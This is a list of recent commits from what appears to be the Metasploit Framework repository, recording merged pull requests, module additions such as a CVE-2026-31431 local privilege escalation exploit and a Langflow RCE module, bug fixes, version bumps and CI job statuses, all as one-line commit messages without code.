Compare commits

...

714 Commits

Author SHA1 Message Date
jenkins-metasploit 1ef3717849 automatic module_metadata_base.json update 2026-05-08 16:35:05 +00:00
Diego Ledda 5814c14781 Merge pull request #21206 from h00die/vim_plugin
vim plugin persistence
2026-05-08 12:24:22 -04:00
jenkins-metasploit 0037e42756 Bump version of framework to 6.4.133 2026-05-08 16:12:09 +00:00
adfoster-r7 33754fd7e8 Merge pull request #21424 from sjanusz-r7/fix-exec-payload-size-crash
Fix exec payload size crash
2026-05-08 17:05:58 +01:00
sjanusz-r7 79b0fd6edc Use rex-text hex string helper, fix module assembly null-terminated string usage
Use rex-text to_hex_cstring keyword arg
2026-05-08 16:41:39 +01:00
sjanusz-r7 8e432f69ca Bump rex-text 2026-05-08 16:41:35 +01:00
sjanusz-r7 d33c2f6600 Re-enabled payload cache size CI specs 2026-05-08 16:35:59 +01:00
Spencer McIntyre 50e5a85521 Merge pull request #21418 from kx7m2qd/fix-get-os-architecture
Fix get_os_architecture for Linux/BSD shell sessions
2026-05-08 09:33:45 -04:00
karan bea8eca0c6 Update rex-arch to 0.1.20 2026-05-08 09:09:10 -04:00
karan d1f9a0fd3b Fix get_os_architecture for Linux/BSD shell sessions
Uses Rex::Arch.from_uname to map uname -m output to ARCH_ constants
for non-meterpreter Linux/BSD shell sessions.

References rapid7/rex-arch#13
Fixes #21403
2026-05-08 09:09:10 -04:00
adfoster-r7 550a8cbdc3 Merge pull request #21425 from g0tmi1k/ftp_stat
ftp: Fix STAT due to unexpected response
2026-05-08 09:28:59 +01:00
g0t mi1k 89b10aa3fe ftp: Fix STAT due to unexpected response 2026-05-08 03:45:38 +01:00
h00die 4da2554a2a cleanup vim plugin 2026-05-07 20:06:32 -04:00
h00die fa69f45366 docs 2026-05-07 15:36:07 -04:00
h00die 5e39ced730 convert persistence mkdirs to lib function 2026-05-07 14:31:12 -04:00
h00die a394578488 vim plugin 2026-05-07 14:17:43 -04:00
Diego Ledda 963eaef422 Merge pull request #21411 from zeroSteiner/fix/linux-x64-exec
Escape strings embedded into the assembly of multiple payloads
2026-05-07 11:11:40 -04:00
jenkins-metasploit 2b42d779a1 automatic module_metadata_base.json update 2026-05-07 12:16:55 +00:00
adfoster-r7 817d3642c3 Merge pull request #21421 from adfoster-r7/update-validation-for-report-vuln
Update validation for report_vuln
2026-05-07 13:06:25 +01:00
adfoster-r7 9435bee69f Update validation for report_vuln 2026-05-07 11:55:39 +01:00
jenkins-metasploit dc1976058c automatic module_metadata_base.json update 2026-05-07 10:40:58 +00:00
adfoster-r7 97fba49fee Merge pull request #21314 from g0tmi1k/report_vuln
Fix #21296 - Add Msf::Auxiliary::Report
2026-05-07 11:28:49 +01:00
jenkins-metasploit 81a7646f0a automatic module_metadata_base.json update 2026-05-06 22:52:54 +00:00
adfoster-r7 a69e2ea707 Merge pull request #21413 from tart0ru5/patch-1
Improve failure condition checks
2026-05-06 23:42:37 +01:00
jenkins-metasploit 2be37dda84 automatic module_metadata_base.json update 2026-05-06 21:23:22 +00:00
Spencer McIntyre 98e588e066 Merge pull request #21410 from inkognitobo/fix/shiro-configurable-gadget-chain
Add configurable JAVA_GADGET_CHAIN option to Shiro module
2026-05-06 17:13:10 -04:00
g0t mi1k e30b6e81ad trace: Add missing report_vuln fields 2026-05-06 17:28:33 +01:00
jenkins-metasploit 38e6629582 automatic module_metadata_base.json update 2026-05-06 15:33:12 +00:00
adfoster-r7 26a7c5f417 Merge pull request #21415 from g0tmi1k/ftp_mixin
ftp: replace @banner_version with banner_version helper method
2026-05-06 16:22:38 +01:00
g0t mi1k b7e1d7ea77 ftp: replace @banner_version with banner_version helper method 2026-05-06 14:46:53 +01:00
jenkins-metasploit e3abb82e88 automatic module_metadata_base.json update 2026-05-06 13:28:27 +00:00
Christophe De La Fuente 696f530475 Merge pull request #21372 from g0tmi1k/ftp_anonymous
ftp_anonymous: Report service/vuln, store loot & update metadata
2026-05-06 15:16:23 +02:00
Spencer McIntyre 6e659caf23 Fix other instances of the same bug 2026-05-06 08:58:15 -04:00
g0t mi1k 48f178a93f ftp_anonymous: Feedback fixes 2026-05-06 13:44:43 +01:00
g0t mi1k ac20cf43e7 ftp_anonymous: Use FTP mixin 2026-05-06 13:32:13 +01:00
g0t mi1k 00c9e33a68 ftp_anonymous: report_service if missing banner 2026-05-06 13:32:13 +01:00
g0t mi1k 825e16bdc5 ftp_anonymous: report_host() when host up, service down 2026-05-06 13:32:13 +01:00
g0t mi1k d647f5f768 ftp_anonymous: Make sure to always disconnect 2026-05-06 13:32:13 +01:00
g0t mi1k 1b1edf938a ftp_anonymous: Clean up FTP banner 2026-05-06 13:32:13 +01:00
g0t mi1k 0f530ec016 ftp_anonymous: Make rubocop happy 2026-05-06 13:32:12 +01:00
g0t mi1k 51b4107dc7 ftp_anonymous: Update ruby code 2026-05-06 13:32:12 +01:00
g0t mi1k 0f696e572c ftp_anonymous: Add notes 2026-05-06 13:32:12 +01:00
g0t mi1k f6484ad724 ftp_anonymous: Store loot 2026-05-06 13:32:12 +01:00
g0t mi1k a0a774e724 ftp_anonymous: Improve logic 2026-05-06 13:32:12 +01:00
g0t mi1k efd59106a0 ftp_anonymous: Report vuln 2026-05-06 13:32:12 +01:00
g0t mi1k 3e320a9db3 ftp_anonymous: Report service 2026-05-06 13:32:12 +01:00
g0t mi1k 726d372257 ftp_anonymous: Remove line prefix 2026-05-06 13:32:12 +01:00
g0t mi1k 2c40a74483 ftp_anonymous: Add CVE 2026-05-06 13:32:12 +01:00
g0t mi1k b40623a0e1 ftp_anonymous: Move module 2026-05-06 13:32:12 +01:00
jenkins-metasploit 7888e29f2c automatic module_metadata_base.json update 2026-05-06 11:12:02 +00:00
adfoster-r7 95492d9680 Merge pull request #21380 from g0tmi1k/ftp_mixin
FTP mixin: Add report_service
2026-05-06 12:00:27 +01:00
g0t mi1k 815afec083 ftp: Add report_host 2026-05-06 10:46:01 +01:00
g0t mi1k 7d824835bc ftp: Add report_note 2026-05-06 10:46:01 +01:00
g0t mi1k 1ce7473b84 ftp: Add report_service 2026-05-06 10:45:55 +01:00
g0t mi1k 98f3bb1d84 ftp: Add banner_version 2026-05-06 10:38:30 +01:00
g0t mi1k 1a9e378dcf ftp: Fix verbose argument fallback 2026-05-06 10:36:59 +01:00
g0t mi1k addbc1b646 ftp: Remove dup IP:PORT in output 2026-05-06 10:36:59 +01:00
tart0ru5 fd6df3fb81 Improve failure condition checks
The prior check silently passes when `res` is `nil` (e.g. request
timeout / host unreachable), because `nil != 403` evaluates to `true`
2026-05-06 11:58:50 +08:00
Spencer McIntyre 9019e4c837 Escape the command in linux/x64/exec 2026-05-05 13:16:30 -04:00
inkognitobo c15d513766 Add configurable JAVA_GADGET_CHAIN option to Shiro module
The gadget chain was previously hardcoded to CommonsCollections2.
Add a JAVA_GADGET_CHAIN OptEnum so operators can select the chain
that matches the target's classpath without modifying the module.

Default remains CommonsCollections2 to preserve existing behaviour.
2026-05-05 17:55:20 +02:00
jenkins-metasploit bc5347f464 automatic module_metadata_base.json update
Command Shell Acceptance / cmd windows-2022 (push) Waiting to run
Command Shell Acceptance / linux ubuntu-latest (push) Waiting to run
Command Shell Acceptance / powershell windows-2025 (push) Waiting to run
Command Shell Acceptance / Generate report (push) Blocked by required conditions
LDAP Acceptance / LDAP Acceptance - ubuntu-latest - Ruby 3.2 (push) Waiting to run
LDAP Acceptance / Generate report (push) Blocked by required conditions
Lint / Lint msftidy (3.2) (push) Waiting to run
Meterpreter Acceptance / build (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2019-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2022-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / Generate report (push) Blocked by required conditions
MySQL Acceptance / mariadb:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / mysql:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / Generate report (push) Blocked by required conditions
Postgres Acceptance / postgres:16.2 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / postgres:9.4 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / Generate report (push) Blocked by required conditions
SMB Acceptance / build (push) Waiting to run
Verify / Docker Build (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
2026-05-04 13:49:03 +00:00
Diego Ledda edb6844c8f Merge pull request #21404 from zeroSteiner/feat/cve-2026-31431
Fix ARMLE exec and add to Copy Fail
2026-05-04 09:37:28 -04:00
jenkins-metasploit 909c8df2cf automatic module_metadata_base.json update 2026-05-01 13:50:15 +00:00
adfoster-r7 bbb2452063 Merge pull request #21342 from adfoster-r7/defer-loading-dependencies
Defer loading rex/metasm/octokit/etc dependencies
2026-05-01 14:37:27 +01:00
Spencer McIntyre 0c81638fff Fix ARMLE exec and add to Copy Fail 2026-04-30 20:03:04 -04:00
adfoster-r7 557ff0d068 Defer loading dependencies 2026-05-01 00:07:59 +01:00
jenkins-metasploit 5a2e7bb301 Bump version of framework to 6.4.132 2026-04-30 23:06:36 +00:00
jenkins-metasploit e8bb3cd5fb automatic module_metadata_base.json update 2026-04-30 22:30:05 +00:00
Brendan dc97d1e97e Merge pull request #21395 from zeroSteiner/feat/cve-2026-31431
Add exploit for CVE-2026-31431 (Copy Fail)
2026-04-30 17:19:08 -05:00
Spencer McIntyre 66995d3987 Only allow x64 and AARCH64 for now 2026-04-30 17:51:30 -04:00
Spencer McIntyre cdcdb5fe88 Normalize reported ARMLE architectures from Meterpreter 2026-04-30 17:09:33 -04:00
Spencer McIntyre bc0f7602c2 Only bind the socket once 2026-04-30 17:09:32 -04:00
Spencer McIntyre 0e02f10078 Add support for more architectures 2026-04-30 17:09:32 -04:00
Spencer McIntyre c0e5ceb531 Add an AARCH64 exec payload 2026-04-30 17:09:32 -04:00
Spencer McIntyre a0c5b9a6bc Merge pull request #21315 from cdelafuente-r7/mcp-server
MCP Server, specs and documentation
2026-04-30 16:33:18 -04:00
Spencer McIntyre e14ce079bb Appease rubocop 2026-04-30 15:18:18 -04:00
Spencer McIntyre 22a9dc4522 Add docs 2026-04-30 14:54:09 -04:00
Spencer McIntyre 55f9216698 Finish the exploit check and cleanup methods 2026-04-30 14:39:46 -04:00
jenkins-metasploit e2e210d038 automatic module_metadata_base.json update 2026-04-30 15:40:08 +00:00
cgranleese-r7 a2b57ae998 Merge pull request #21352 from adfoster-r7/improve-checkcode-messages-5
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 16:29:07 +01:00
Spencer McIntyre 12e08fb451 Add an expanded check 2026-04-30 10:54:17 -04:00
adfoster-r7 3bee31ff5e Update checkcodes and bug fixes 2026-04-30 15:42:10 +01:00
Spencer McIntyre d0a205f776 Add the initial LPE exploit 2026-04-30 09:53:35 -04:00
Spencer McIntyre 9f6349de7d Initial commit of updated stub
Stub has been updated to forward arguments to /bin/sh
2026-04-30 09:53:12 -04:00
jenkins-metasploit 5942122b9a automatic module_metadata_base.json update 2026-04-30 10:06:45 +00:00
cgranleese-r7 49ea1a3391 Merge pull request #21359 from adfoster-r7/improve-checkcode-messages-12
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:46:41 +01:00
cgranleese-r7 b3fbeced43 Merge pull request #21355 from adfoster-r7/improve-checkcode-messages-8
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:44:04 +01:00
cgranleese-r7 7b3aef8ede Merge pull request #21353 from adfoster-r7/improve-checkcode-messages-6
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:43:21 +01:00
Christophe De La Fuente 6f3884e832 Redesign the logging capability using Rex::Logging and Rake middleware
- remove the original Logger
- use Rex::Logging with helper methods (dlog, ilog, etc.)
- add `sanitize` configuration option
- create Sanitizing, JsonFlatfile and JsonStream sinks for JSON logging format
- minor updates in apply_default (Loader)
- update the re-authentication logic (fix a specific usecase)
- add a Rack middleware that logs MCP HTTP request/response
- use Rex::Socket::Tcp instead of TcpSocket
- update the ensure_rpc_available for better validation
- use around_request instead of the deprecated SDK instrumentation for logging
- update and add specs
2026-04-30 11:10:09 +02:00
adfoster-r7 b59ced5057 Add human-readable descriptions to CheckCode returns in multi/http exploit modules (A-O) 2026-04-30 00:25:30 +01:00
adfoster-r7 0bf595c2ec Add human-readable descriptions to CheckCode returns in unix/webapp exploit modules 2026-04-30 00:16:04 +01:00
jenkins-metasploit 15a0f6eefd automatic module_metadata_base.json update 2026-04-29 19:30:36 +00:00
Spencer McIntyre 2634142f0d Merge pull request #21323 from jheysel-r7/feat/http_to_ldap
HTTP to LDAP Relay Module
2026-04-29 15:20:10 -04:00
Spencer McIntyre 2153daad7b Update the specs 2026-04-29 14:38:29 -04:00
Jack Heysel 4847d88441 HTTP to LDAP Relay Module and Supporting Libraries
Remove unnecessary code

Remove commented out code

Added documentation

Responded to Spencer and Copilot

Add anonymous identity check

Doc update

Warning surpression

Renamed ldap_client to relayed_connection

Comments
2026-04-29 07:48:42 -07:00
jenkins-metasploit 788aa2abc5 automatic module_metadata_base.json update 2026-04-29 13:18:45 +00:00
Spencer McIntyre 2cfdfcba60 Merge pull request #21392 from dwelch-r7/skip-windows-test-on-non-windows-system
skip Windows-specific tests on non-Windows platforms
2026-04-29 09:08:03 -04:00
dwelch-r7 bcae34ee4f Update test/modules/post/test/cmd_exec.rb
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-29 13:11:06 +01:00
Dean Welch 6df54a639e skip Windows-specific tests on non-Windows platforms 2026-04-29 13:05:17 +01:00
jenkins-metasploit 41a937c70c automatic module_metadata_base.json update 2026-04-27 11:20:38 +00:00
adfoster-r7 63f4f358c7 Merge pull request #21092 from sjanusz-r7/fix-macos-mingw-syscall_inject-compilation
Fix syscall_inject compilation errors on MacOS with MinGW 15
2026-04-27 12:09:19 +01:00
adfoster-r7 1e3727ba87 Add human-readable descriptions to CheckCode returns in remaining multi exploit modules 2026-04-25 10:52:11 +01:00
jenkins-metasploit e909b9218b Bump version of framework to 6.4.131 2026-04-25 08:54:14 +00:00
adfoster-r7 d121ff6a62 Merge pull request #21307 from adfoster-r7/improve-vuln-and-vuln-attempt-tracking
Improve vuln and vuln attempt tracking
2026-04-24 18:36:28 +01:00
adfoster-r7 e00515c172 Update logic for aux modules having called report_vuln already 2026-04-24 16:26:49 +01:00
adfoster-r7 3ecbadd032 Improve vuln and vuln attempt tracking 2026-04-24 16:26:49 +01:00
cgranleese-r7 7c4f15a024 Merge pull request #21354 from adfoster-r7/improve-checkcode-messages-7
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 16:13:19 +01:00
adfoster-r7 7479078bf1 Merge pull request #21356 from adfoster-r7/improve-checkcode-messages-9
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:45 +01:00
adfoster-r7 b09686efaf Merge pull request #21357 from adfoster-r7/improve-checkcode-messages-10
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:19 +01:00
adfoster-r7 b765db798e Merge pull request #21358 from adfoster-r7/improve-checkcode-messages-11
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:00 +01:00
Simon Janusz aa14df9b6c Merge pull request #21368 from sjanusz-r7/change-php-payload-size
Change PHP payload die func message
2026-04-24 13:47:19 +01:00
adfoster-r7 1d1c284619 Merge pull request #21364 from sjanusz-r7/update-payload-cached-sizes-on-new-metadata-cache
Update payload cached sizes when creating new module metadata cache
2026-04-24 11:15:55 +01:00
sjanusz-r7 a153814b0f Change PHP payload die func message 2026-04-24 11:08:38 +01:00
jenkins-metasploit 17f7f4d718 Bump version of framework to 6.4.130 2026-04-23 15:02:38 +00:00
jenkins-metasploit 74468290c9 automatic module_metadata_base.json update 2026-04-23 14:54:17 +00:00
Spencer McIntyre 540139cd4a Merge pull request #21341 from g0tmi1k/smb
Fix various smb/samba issues
2026-04-23 10:45:58 -04:00
adfoster-r7 370c35c1e2 Add human-readable descriptions to CheckCode returns in windows/http exploit modules 2026-04-23 15:37:09 +01:00
jenkins-metasploit cb1cfbbe98 automatic module_metadata_base.json update 2026-04-23 14:21:28 +00:00
Brendan 2289fc07ce Merge pull request #21260 from Takahiro-Yoko/langflow_rce_cve_2026_27966
Add Langflow RCE module (CVE-2026-27966)
2026-04-23 09:12:12 -05:00
cgranleese-r7 107edff1cb Merge pull request #21278 from adfoster-r7/fix-msftidy-heading-in-codeblock-edgecase
Fix msftidy heading in codeblock edgecase
2026-04-23 13:23:55 +01:00
jenkins-metasploit 4521c9f3d3 automatic module_metadata_base.json update 2026-04-23 12:03:13 +00:00
g0t mi1k 76cae04e91 smb_login: Add report_service (regardless of RECORD_GUEST)
RECORD_GUEST = creds, not service
2026-04-23 12:59:19 +01:00
g0t mi1k 4f77df25ba smb_uninit_cred: Add report_service 2026-04-23 12:59:19 +01:00
g0t mi1k 792a4254ac smb_uninit_cred: Print correct port 2026-04-23 12:59:19 +01:00
g0t mi1k eb5b5a1277 smb_uninit_cred: Rex::Proto::DCERPC::Exceptions::Fault DCERPC FAULT => nca_op_rng_error 2026-04-23 12:59:18 +01:00
g0t mi1k 950fb9def6 smb_lookupsid: Hide table if results empty 2026-04-23 12:59:18 +01:00
g0t mi1k 2e58eb1207 psexec_loggedin_users: NoMethodError. undefined method `each_line' for false 2026-04-23 12:59:18 +01:00
g0t mi1k a173ea15fa smb_version: Remove duplicated report_service 2026-04-23 12:59:18 +01:00
g0t mi1k 3c1b245751 Fix #21339: NoMethodError undefined method `each' for an instance of String 2026-04-23 12:59:18 +01:00
g0t mi1k ca27731285 Fix #21338: NoMethodError undefined method `domain_handle' for nil 2026-04-23 12:59:18 +01:00
g0t mi1k 2d93669f56 Fix #21337: NoMethodError' 'undefined method `empty?' for nil 2026-04-23 12:59:18 +01:00
cgranleese-r7 1142d4e15d Merge pull request #21351 from adfoster-r7/improve-checkcode-messages-4
Add human-readable descriptions to CheckCode returns modules
2026-04-23 12:54:31 +01:00
adfoster-r7 96a37da14a Add human-readable descriptions to CheckCode returns in multi/http exploit modules (P-Z) 2026-04-23 12:26:32 +01:00
sjanusz-r7 f00bbe6451 Update payload cached sizes when creating new module metadata cache 2026-04-23 12:06:09 +01:00
jenkins-metasploit f1778187b8 automatic module_metadata_base.json update 2026-04-23 11:04:15 +00:00
cgranleese-r7 9ad8b7ac32 Merge pull request #21360 from adfoster-r7/improve-checkcode-messages-13
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:55:46 +01:00
jenkins-metasploit 8a5d7be47a automatic module_metadata_base.json update 2026-04-23 10:45:19 +00:00
cgranleese-r7 591dbdd821 Merge pull request #21350 from adfoster-r7/improve-checkcode-messages-3
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:33:27 +01:00
adfoster-r7 c38f6b4858 Update checkcodes and bug fixes 2026-04-23 10:20:53 +01:00
adfoster-r7 3e61396ec2 Add human-readable descriptions to CheckCode returns in unix, freebsd, osx, and other exploit modules 2026-04-23 10:02:22 +01:00
jenkins-metasploit e5bdc50a4f automatic module_metadata_base.json update 2026-04-22 20:35:33 +00:00
Spencer McIntyre 44d60c0865 Merge pull request #21347 from g0tmi1k/smb_version
smb_version: Make SMBv1 happy
2026-04-22 16:27:08 -04:00
adfoster-r7 2ae936473e Add human-readable descriptions to CheckCode returns in remaining windows exploit modules 2026-04-22 18:44:55 +01:00
adfoster-r7 45bc95a876 Add human-readable descriptions to CheckCode returns in windows/local exploit modules 2026-04-22 18:43:59 +01:00
adfoster-r7 aaf536d189 Merge pull request #21361 from sjanusz-r7/payload-cache-size-changes
Comment out payload size cache tests
2026-04-22 17:13:23 +01:00
sjanusz-r7 8587d1c211 Skip payload cached size specs 2026-04-22 16:31:51 +01:00
adfoster-r7 05befe18b1 Add human-readable descriptions to CheckCode returns in linux/local exploit modules 2026-04-22 15:06:59 +01:00
jenkins-metasploit 7851cda71d automatic module_metadata_base.json update 2026-04-22 13:49:02 +00:00
cgranleese-r7 380911db97 Merge pull request #21349 from adfoster-r7/improve-checkcode-messages-2
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:32:05 +01:00
cgranleese-r7 de636c1457 Merge pull request #21348 from adfoster-r7/improve-checkcode-messages-1
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:30:48 +01:00
adfoster-r7 f3b07d5a49 Add human-readable descriptions to CheckCode returns in auxiliary and post modules 2026-04-22 13:56:54 +01:00
adfoster-r7 2cbb3942b6 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (A-M) 2026-04-22 13:08:59 +01:00
g0t mi1k b7f136077e smb_version: Be more verbose - show smb1 if possible 2026-04-22 13:08:20 +01:00
g0t mi1k 0474c0ce24 smb_version: Add spacing between : 2026-04-22 13:08:20 +01:00
g0t mi1k 1d9c922488 Make smb_version happy with smbv1 2026-04-22 13:08:19 +01:00
cgranleese-r7 25d7c25ad8 Merge pull request #21346 from adfoster-r7/fix-false-positive-on-couchdb-enum-check
Fix false positive on couchdb enum check
2026-04-22 12:38:47 +01:00
adfoster-r7 19d333df13 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (N-Z) 2026-04-22 11:55:15 +01:00
adfoster-r7 6e992aa6ed Fix false positive on couchdb enum check 2026-04-21 22:48:27 +01:00
jenkins-metasploit 9efc727462 automatic module_metadata_base.json update 2026-04-21 17:21:45 +00:00
Christophe De La Fuente 4c0f2c29bc Merge pull request #21019 from g0tmi1k/phpmyadmin_config 2026-04-21 19:13:04 +02:00
jenkins-metasploit 9692b8865f automatic module_metadata_base.json update 2026-04-21 17:08:11 +00:00
Spencer McIntyre 6a00ea38c6 Merge pull request #21306 from dledda-r7/feat/block-api-randomization
Block Api ROR13 IV randomization
2026-04-21 12:58:30 -04:00
Christophe De La Fuente 946d1a44b5 Fix Notes format (array) 2026-04-21 18:43:54 +02:00
jenkins-metasploit cca7166eb4 automatic module_metadata_base.json update 2026-04-21 15:05:42 +00:00
adfoster-r7 a918184416 Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support
Fix elasticsearch traversal check support
2026-04-21 15:57:26 +01:00
adfoster-r7 81f1a7c86a Fix elasticsearch traversal check support 2026-04-21 15:18:58 +01:00
adfoster-r7 97ab01cddd Merge pull request #21340 from dledda-r7/ci/disable-meterpreter-ci
Disable Windows Server 2022 CI
2026-04-21 15:01:35 +01:00
dledda-r7 b9573fa0ce ops(meterpreter): disable windows server 2022 build until 141_xp dependency is removed 2026-04-21 05:55:29 -04:00
dledda-r7 e40422845b fix: block_api.rb update 2026-04-21 05:43:34 -04:00
Spencer McIntyre 20065b3f3d Fix the include errors 2026-04-20 18:36:00 -04:00
Spencer McIntyre 44a45ffdbf Switch to Rex::Logging 2026-04-20 18:14:56 -04:00
Brendan 2dbfcfb918 Merge pull request #21232 from bcoles/file-find_writable_directories
Add find_writable_directories to Msf::Post::File
2026-04-20 16:33:53 -05:00
jenkins-metasploit ae63cb9b1d automatic module_metadata_base.json update 2026-04-20 20:41:14 +00:00
Brendan 6b57b4c66f Merge pull request #21256 from g0tmi1k/webdav
WebDAV improvements
2026-04-20 15:30:43 -05:00
Christophe De La Fuente 820e737024 Update from code review and some fixes
- add the `--mcp-transport` option
- prefix the MCP env. variable with `MSF_`
- move the code under `lib/msf/core/mcp/`
- move specs under `spec/lib/msf/core/mcp/`
- change the namespace from `MsfMcp` to `Msf::RPC`
- update the `lib/msf_autoload.rb` to exclude the mcp-related files
- add missing validation for the `mcp`, `rate_limit and `logging` sections in the config file
- remove duplicate error exception classes
- fix an error in the transformers related to the `created_at` field
- fix a small issue in the input validator when regex are used
- update the way error is reported for MCP Tools to be compatible with the changes in the new `mcp` gem
- update and add specs
2026-04-20 18:29:21 +02:00
adfoster-r7 bd2e11ad55 Merge pull request #21331 from bcoles/metadata-obj
Metadata::Obj: Deduplicate notes hash strings and memoize `Obj#path` to reduce retained memory in the module metadata cache
2026-04-20 16:55:33 +01:00
jenkins-metasploit 6acac8e120 automatic module_metadata_base.json update 2026-04-20 13:31:53 +00:00
cgranleese-r7 a53d0a027b Merge pull request #21332 from adfoster-r7/remove-false-positive-from-nodejs-pipelining-check
Remove false positive from nodejs pipelining check
2026-04-20 14:22:23 +01:00
Diego Ledda 46553b5984 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:47 +02:00
Diego Ledda 5622bd254b Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:07 +02:00
Diego Ledda 2c58825343 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:18:54 +02:00
adfoster-r7 f060acd1e9 Remove false positive from nodejs pipelining check 2026-04-20 14:02:56 +01:00
bcoles 09bb98d13e Memoize Obj#path to avoid repeated File.join
The install_root path is immutable at runtime, so cache the computed
full path on first access instead of calling File.join on every call.
2026-04-20 22:19:55 +10:00
bcoles 76a7f61465 Deduplicate notes hash keys and values in metadata Obj
Notes keys ("Stability", "SideEffects", "Reliability") and values
("crash-safe", "ioc-in-logs", etc.) are repeated across thousands of
modules. Use frozen string dedup (-str) to share a single object per
unique string, reducing ~24K string allocations to ~185 shared objects.
2026-04-20 22:17:40 +10:00
adfoster-r7 e09a38085c Merge pull request #21330 from bcoles/modules-loader
Replace Pathname with string prefix removal in directory module loader
2026-04-20 11:45:33 +01:00
adfoster-r7 fe1aeb9279 Merge pull request #21329 from bcoles/modulemanager-cache
Simplify get_parent_path with rindex instead of split/join
2026-04-20 11:30:04 +01:00
adfoster-r7 9b985dc1ef Merge pull request #21327 from tair-m/master
Fix uninitialized constant HTTP::CookieJar by correcting load order in http_cookie_jar.rb
2026-04-20 10:39:02 +01:00
bcoles a8ccdfc1e4 Simplify get_parent_path with rindex instead of split/join
Replace File.join + String#split + array slice + Array#join with a
single String#rindex lookup. This avoids allocating intermediate arrays
and strings on every call (once per cached module during startup).
2026-04-20 18:22:53 +10:00
bcoles b1c4fd3f39 Replace Pathname with string prefix removal in directory module loader
Msf::Modules::Loader::Directory#each_module_reference_name created two
Pathname objects per module file and called relative_path_from to derive
the module reference name. With ~5,000 module files this produced
~170,000 calls to Pathname#chop_basename internally.

Since Rex::Find.find always yields absolute paths rooted at
full_entry_path, simple String#delete_prefix achieves the same result
without allocating Pathname objects.
2026-04-20 18:14:54 +10:00
Takah1ro f54374eaff Update exploit to improve stability 2026-04-18 12:56:53 +09:00
tair 4607741a16 Fix LoadError in http_cookie_jar for Ruby 3.3.0 2026-04-18 07:17:26 +05:00
g0t mi1k 94b4f577e0 WebDAV: MR feedback 2026-04-17 22:19:26 +01:00
jenkins-metasploit 046ba861b3 automatic module_metadata_base.json update 2026-04-17 16:21:38 +00:00
jheysel-r7 08f6dc20a5 Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2026-04-17 09:13:07 -07:00
Takah1ro a47234778c Increase WfsDelay 2026-04-17 23:54:43 +09:00
adfoster-r7 92af54c885 Merge pull request #21230 from bcoles/obj-dedup-cache
Reduce memory footprint of module metadata Obj instances
2026-04-17 12:33:23 +01:00
adfoster-r7 19112a0212 Merge pull request #21231 from bcoles/msf-module-cache
Module metadata: Fix stale module detection and add per-type metadata index
2026-04-17 11:25:44 +01:00
dledda-r7 679d2a9a4e feat: enhance block_api_iv handling with warnings and options for payload methods 2026-04-17 06:07:18 -04:00
bcoles 785307f55e Module metadata: Fix stale module detection and add per-type metadata index 2026-04-17 19:41:18 +10:00
dledda-r7 82c8028f1c refactor: remove redundant block_api_iv calls in payload generation methods 2026-04-17 05:38:19 -04:00
